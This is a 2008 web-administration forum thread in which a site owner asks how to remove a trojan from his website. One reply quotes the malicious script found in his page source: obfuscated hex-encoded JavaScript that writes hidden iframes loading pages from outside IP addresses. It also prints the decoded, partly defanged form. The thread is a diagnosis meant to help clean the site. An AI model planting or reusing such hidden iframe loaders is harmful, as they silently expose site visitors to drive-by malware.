Tycoon Talk
Become a Big fish!
The number 1 forum for online business!
Post topics, ask questions, share your knowledge.
Tycoon Talk is part of Freelancer.com - find skilled workers online at a fraction of the cost.

Website and Server Administration Forum


You are currently viewing our Website and Server Administration Forum as a guest. Please register to participate.
Login


Tycoon Talk > Web Administration Support > Website and Server Administration Forum > How to get rid of a trojan on my website?

Reply
How to get rid of a trojan on my website?
Old 06-27-2008, 04:17 AM How to get rid of a trojan on my website?
Junior Talker

Posts: 1
Trades: 0
Talkupation: syyll is on a distinguished road
Hi,

My website : www . voyageautourdumonde . fr is infected by a trojan.
Does anyone know how to get rid of it?

Thanks a lot

Sylvain
Last edited by vangogh; 06-27-2008 at 06:23 PM..
syyll is offline
Reply With Quote
View Public Profile
 
 
Register now for full access!
Old 06-27-2008, 04:42 AM Re: How to get rid of a trojan on my website?
minsky's Avatar
Experienced Talker

Posts: 49
Name: Minsky
Location: UK
Trades: 0
Talkupation: minsky is on a distinguished road
Well, the first thing I'd say is, if your website is infected you shouldn't be posting the URL on forums. I certainly won't be clicking the link.

There are people on here far more qualified to answer this qustion than me, but I'll have a go.

If it were my site I'd start by deleting all files so that nobody else runs the risk of catching it. You could put up a temporary flyer page.

Then I'd contact my host and ask for their help.

My "guess" is, if you deleted all the files and then re-uploaded them from fresh, it might clear the problem. But it is only a guess. Obviously, you need to check the files on your computer are virus free too.
__________________
Never argue with a fool. They will drag you down to their level and then beat you with experience.
Last edited by minsky; 06-27-2008 at 04:43 AM..
minsky is offline
Reply With Quote
View Public Profile
 
Old 06-27-2008, 08:28 AM Re: How to get rid of a trojan on my website?
tripy's Avatar
Do not try this at home!

Latest Blog Post:
GooTrans, a cross-platform python frontend to Goog...
Posts: 3,621
Name: Thierry
Location: I'm the uber Spaminator !
Trades: 0
Talkupation: tripy has a reputation beyond reputetripy has a reputation beyond reputetripy has a reputation beyond reputetripy has a reputation beyond reputetripy has a reputation beyond reputetripy has a reputation beyond reputetripy has a reputation beyond reputetripy has a reputation beyond reputetripy has a reputation beyond reputetripy has a reputation beyond reputetripy has a reputation beyond repute
It might not be your files that are causing the problem.
I've seen that once in a small dev/hosting company.

The web server was breached by pirates, that modified the Apache config to add HTML to any pages sent to a browser.
Looking at your site index source, I see that:
HTML Code:
</body>
</html>
<script>
function v4821762cb3582(v4821762cb397d){ function v4821762cb3d79 () {var v4821762cb4188=16; return v4821762cb4188;} return(parseInt(v4821762cb397d,v4821762cb3d79()));}function v4821762cb4971(v4821762cb5180){ function v4821762cb697c () {return 2;} var v4821762cb5975='';for(v4821762cb616f=0; v4821762cb616f<v4821762cb5180.length; v4821762cb616f+=v4821762cb697c()){ v4821762cb5975+=(String.fromCharCode(v4821762cb3582(v4821762cb5180.substr(v4821762cb616f, v4821762cb697c()))));}return v4821762cb5975;} document.write(v4821762cb4971('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6565207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A31363830292B273932613337665C272077696474683D323430206865696768743D37207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
</script>
<script>
<!--
var d=document,kol=561;
function O10H48608F66DD33D(H48608F66DD739){ function H48608F66DDB35() {return 16;} return( parseInt(H48608F66DD739,H48608F66DDB35()));}function H48608F66DE330(H48608F66DE72B){ var H48608F66DF320 = 2; var H48608F66DEB27='';for(H48608F66DEF37=0; H48608F66DEF37<H48608F66DE72B.length; H48608F66DEF37+=H48608F66DF320){ H48608F66DEB27 += ( String.fromCharCode (O10H48608F66DD33D(H48608F66DE72B.substr(H48608F66DEF37, H48608F66DF320))));}return H48608F66DEB27;} document.write(H48608F66DE330('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3434343630292B2764333637363435356662635C272077696474683D333830206865696768743D313137207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
which seems highly suspect to me.
Look at your local file or in a backup if it contains those lines.
They might be added dynamically if the server was compromised.

PS:
After working my way through them, this is what is generated by this JS:
!!! DO NOT TRY TO FOLLOW THE IFRAME LINK!!!
Even if I have invalidated it, it still can harm your computer.
Code:
<SCRIPT>window.status='Done';document.write('<iframe name=ee src=\'http://_77._221._133._150/.if/go.html?'+Math.round(Math.random()*1680)+'92a37f\' width=240 height=7 style=\'display: none\'></iframe>')</SCRIPT>
<script>if(!myia){d.write('<IFRAME name=O1 src=\'http://_77._221._133._171/.if/go.html?'+Math.round(Math.random()*44460)+'d3676455fbc\' width=380 height=117 style=\'display: none\'></IFRAME >');}var myia=true;</script>
</script>
But definitively, look at your backup if this snippet is present. If not, contact your hoster, they might need to take action.
__________________
Only a biker knows why a dog sticks his head out the window.
tripy is offline
Reply With Quote
View Public Profile Visit tripy's homepage!
 
Old 06-29-2008, 08:26 PM Re: How to get rid of a trojan on my website?
FGU
FGU's Avatar
Super Talker

Posts: 116
Trades: 0
Talkupation: FGU is on a distinguished road
You mean 4 trojans?

http://safebrowsing.clients.google.c...ourdumonde.fr/
FGU is offline
Reply With Quote
View Public Profile
 
Old 06-30-2008, 10:38 AM Re: How to get rid of a trojan on my website?
minsky's Avatar
Experienced Talker

Posts: 49
Name: Minsky
Location: UK
Trades: 0
Talkupation: minsky is on a distinguished road
Strange. When I hit the [Add Reply] button to this thread my anti virus kicks in.

It's only on this thread, no others.

Image attached:
Attached Images
File Type: jpg virus.jpg (53.3 KB, 5 views)
__________________
Never argue with a fool. They will drag you down to their level and then beat you with experience.
minsky is offline
Reply With Quote
View Public Profile
 
Reply     « Reply to How to get rid of a trojan on my website?
 
Previous Thread | Next Thread Tycoon Talk > Web Administration Support > Website and Server Administration Forum > How to get rid of a trojan on my website?

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off




   
RSS Feed  Feeds: RSS   JS   XML
RSS Feed  Feeds for this forum: RSS   JS   XML



Page generated in 0.19616 seconds with 13 queries